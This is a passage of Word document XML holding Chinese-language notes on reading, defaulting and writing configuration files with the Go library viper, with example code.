    <w:p w14:paraId="50F85203" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616F197A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3135BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="OLE_LINK2"/>
      <w:r>
        <w:t>viper.SetConfigName("config")</w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
      <w:r>
        <w:t xml:space="preserve"> // name of config file (without extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E75406" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="OLE_LINK3"/>
      <w:r>
        <w:t>viper.SetConfigType("yaml")</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:r>
        <w:t xml:space="preserve"> // REQUIRED if the config file does not have the extension in the name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058F4539" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="OLE_LINK4"/>
      <w:r>
        <w:t>viper.AddConfigPath("/etc/appname/")</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
      <w:r>
        <w:t xml:space="preserve">   // path to look for the config file in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F436B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.AddConfigPath("$HOME/.appname")  // call multiple times to add many search paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA440D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.AddConfigPath(".")               // optionally look for config in the working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60017AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="OLE_LINK5"/>
      <w:r>
        <w:t>err := viper.ReadInConfig()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
      <w:r>
        <w:t xml:space="preserve"> // Find and read the config file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D64FAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if err != nil { // Handle errors reading the config file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBBC823" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>panic(fmt.Errorf("fatal error config file: %w", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9BF35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05291B97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15142056" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if err := viper.ReadInConfig(); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40294AB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if _, ok := err.(viper.ConfigFileNotFoundError); ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B247FFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Config file not found; ignore error if desired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ECC27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAB354" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Config file was found but another error was produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BEA270" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A8584" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58910945" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// Config file found and successfully parsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D80B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DF0455" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB5F849" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F02E654" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4B0E3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B067094" w14:textId="77777777" w:rsidR="00346452" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">package main </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C3953" w14:textId="77777777" w:rsidR="00346452" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">import ( "fmt" "log" "github.com/spf13/viper" ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A815B" w14:textId="77777777" w:rsidR="00346452" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">func main() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9D942" w14:textId="2330D33E" w:rsidR="00346452" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidR="00346452">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.SetConfigName("config") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F171296" w14:textId="77777777" w:rsidR="00346452" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.SetConfigType("toml") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E1F51" w14:textId="72407D62" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.AddConfigPath(".") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B42225" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438EB65D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>//viper.ReadInConfig() 之前，可以先设置个默认值，配置文件此时还没解析，解析出来他自动覆盖这个默认值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6EE38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>viper.SetDefault("redis.port", 6381)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201DAB6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D45EFE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">err := viper.ReadInConfig() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F105391" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">if err != nil { log.Fatal("read config failed: %v", err) } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062D0CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println(viper.Get("app_name")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0E3F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println(viper.Get("log_level")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39669456" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("mysql ip: ", viper.Get("mysql.ip")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5568A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("mysql port: ", viper.Get("mysql.port")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CBE75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("mysql user: ", viper.Get("mysql.user")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A438F01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("mysql password: ", viper.Get("mysql.password")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD206FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("mysql database: ", viper.Get("mysql.database")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062C16B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("redis ip: ", viper.Get("redis.ip")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A317D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println("redis port: ", viper.Get("redis.port")) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D65125" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3E190" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05214B73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6958313F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7766401C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6668A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7888730D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.WriteConfig() // writes current config to predefined path set by 'viper.AddConfigPath()' and 'viper.SetConfigName'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B2BF66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SafeWriteConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55656154" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.WriteConfigAs("/path/to/my/.config")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53B2FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SafeWriteConfigAs("/path/to/my/.config") // will error since it has already been written</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05E407" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>viper.SafeWriteConfigAs("/path/to/my/.other_config")</w:t>
